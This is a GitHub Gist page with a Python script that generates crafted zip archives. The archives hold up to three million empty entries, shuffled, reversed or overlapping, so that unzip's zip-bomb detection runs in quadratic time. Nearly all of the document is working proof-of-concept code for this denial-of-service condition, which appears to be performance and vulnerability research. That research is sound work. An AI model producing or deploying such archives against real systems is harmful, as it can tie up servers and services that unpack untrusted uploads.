Last active
April 20, 2025 16:47
-
-
Save maksverver/c1d3ece843e613e1a6dde47300a87593 to your computer and use it in GitHub Desktop.
Python script to generate zip files which make the zip bomb detection logic in unzip run in quadratic time
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# Generates zip files that trigger quadratic runtime in unzip with zip bomb | |
# detection enabled. | |
import zlib | |
from random import shuffle, randrange | |
from struct import pack | |
def MakeBytes(data): | |
if isinstance(data, str): | |
data = data.encode('utf-8') | |
assert isinstance(data, bytes) | |
return data | |
def CreateFileHeaders(name, data, offset, extra=b'', comment=b''): | |
name = MakeBytes(name) | |
data = MakeBytes(data) | |
extra = MakeBytes(extra) | |
comment = MakeBytes(comment) | |
local_file_sig = 0x04034b50 | |
central_directory_sig = 0x02014b50 | |
gen_ver = min_ver = 10 | |
flags = 0 | |
comp = 0 | |
mtime = 0 | |
mdate = 0 | |
crc32 = zlib.crc32(data) | |
csize = len(data) | |
usize = len(data) | |
name_len = len(name) | |
extra_len = len(extra) | |
comment_len = len(comment) | |
disk_no = 0 | |
int_attr = 0 | |
ext_attr = 0 | |
local_file_header = pack('<IHHHHHIIIHH', local_file_sig, min_ver, flags, comp, mtime, mdate, crc32, csize, usize, name_len, extra_len) + name + extra | |
central_directory_file_header = pack('<IHHHHHHIIIHHHHHII', central_directory_sig, gen_ver, min_ver, flags, comp, mtime, mdate, crc32, csize, usize, name_len, extra_len, comment_len, disk_no, int_attr, ext_attr, offset) + name + extra + comment | |
return (local_file_header, central_directory_file_header) | |
def CreateEndOfCentralDirectoryRecord(entries, offset, comment=b''): | |
sig = 0x06054b50 | |
current_disk = start_disk = 0 | |
entries_on_disk = num_entries = min(len(entries), 65535) | |
total_size = sum(len(entry) for entry in entries) | |
comment = MakeBytes(comment) | |
comment_len = len(comment) | |
return pack('<IHHHHIIH', sig, current_disk, start_disk, entries_on_disk, num_entries, total_size, offset, comment_len) + comment | |
def CreateZip64EndOfCentralDirectoryRecord(entries, offset): | |
sig = 0x06064b50 | |
gen_ver = min_ver = 45 | |
current_disk = 0 | |
start_disk = 0 | |
record_size = 44 | |
entries_on_disk = num_entries = len(entries) | |
total_size = sum(len(entry) for entry in entries) | |
return pack('<IQHHIIQQQQ', sig, record_size, gen_ver, min_ver, current_disk, start_disk, entries_on_disk, num_entries, total_size, offset) | |
def CreateZip64EndOfCentralDirectoryLocator(offset): | |
sig = 0x07064b50 | |
disk_no = 0 | |
disk_count = 1 | |
return pack('<IIQI', sig, disk_no, offset, disk_count) | |
def GenerateTestCase(zip_filename, num_files, padding=None, transform=None, overlap=False): | |
with open(zip_filename, 'wb') as f: | |
entries = [] | |
def AddFile(name, data, /, offset=None): | |
if offset is None: offset = f.tell() | |
data = MakeBytes(data) | |
local_header, central_header = CreateFileHeaders(name, data, offset) | |
entries.append(central_header) | |
f.write(local_header) | |
f.write(data) | |
def AddPadding(n): | |
f.write(bytes(n)) | |
for i in range(num_files): | |
AddFile(f'{i}', '') | |
if padding: f.write(padding) | |
# This is important to trigger the worst case complexity. | |
if transform: | |
transform(entries) | |
if overlap: | |
# Make zip file invalid by adding an entry at the wrong offset. | |
# This should trigger zip bomb detection: | |
AddFile('x', '', offset=randrange(0, f.tell())) | |
# Write central directory followed by end-of-central-directory record. | |
central_directory_offset = f.tell() | |
central_directory = b''.join(entries) | |
f.write(central_directory) | |
if len(entries) >= 65535: | |
# Generate zip64 headers | |
zip64_eocdr_offset = f.tell() | |
f.write(CreateZip64EndOfCentralDirectoryRecord(entries, offset=central_directory_offset)) | |
f.write(CreateZip64EndOfCentralDirectoryLocator(offset=zip64_eocdr_offset)) | |
f.write(CreateEndOfCentralDirectoryRecord(entries, offset=central_directory_offset)) | |
if __name__ == '__main__': | |
reverse = list.reverse | |
# Normal zip file with no padding between files. This doesn't | |
# trigger quadratic runtime because adjacent spans get merged. | |
GenerateTestCase('many-files-64k.zip', 65534) | |
# Invalid zip file where file entries overlap: | |
GenerateTestCase('many-files-64k-overlap.zip', 65534, overlap=True) | |
# Zip file with no padding between files, but with shuffled entries, | |
# which triggers quadratic runtime. | |
GenerateTestCase('many-files-64k-shuffled.zip', 65534, transform=shuffle) | |
# Zip file with padding between files. This uses linear memory, but doesn't | |
# trigger quadratic runtime because new entries are added at the end of the | |
# buffer which uses exponential resizing. | |
GenerateTestCase('many-files-64k-padded.zip', 65534, padding=bytes(1)) | |
# Zip file with padding between files and entries in reverse, which triggers | |
# worst-case behavior. | |
GenerateTestCase('many-files-64k-padded-reversed.zip', 65534, padding=bytes(1), transform=reverse) | |
# Same as above, but with 1 million entries. | |
GenerateTestCase('many-files-1m-padded-shuffled.zip', 10**6, padding=bytes(1), transform=shuffle) | |
# Same as above, but with overlap, which should trigger zip bomb detection. | |
GenerateTestCase('many-files-1m-padded-shuffled-overlap.zip', 10**6, padding=bytes(1), transform=shuffle, overlap=True) | |
# Some larger cases for benchmarking: | |
GenerateTestCase('many-files-1m-padded-reversed.zip', 1 * 10**6, padding=bytes(1), transform=reverse) | |
GenerateTestCase('many-files-2m-padded-reversed.zip', 2 * 10**6, padding=bytes(1), transform=reverse) | |
GenerateTestCase('many-files-3m-padded-reversed.zip', 3 * 10**6, padding=bytes(1), transform=reverse) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment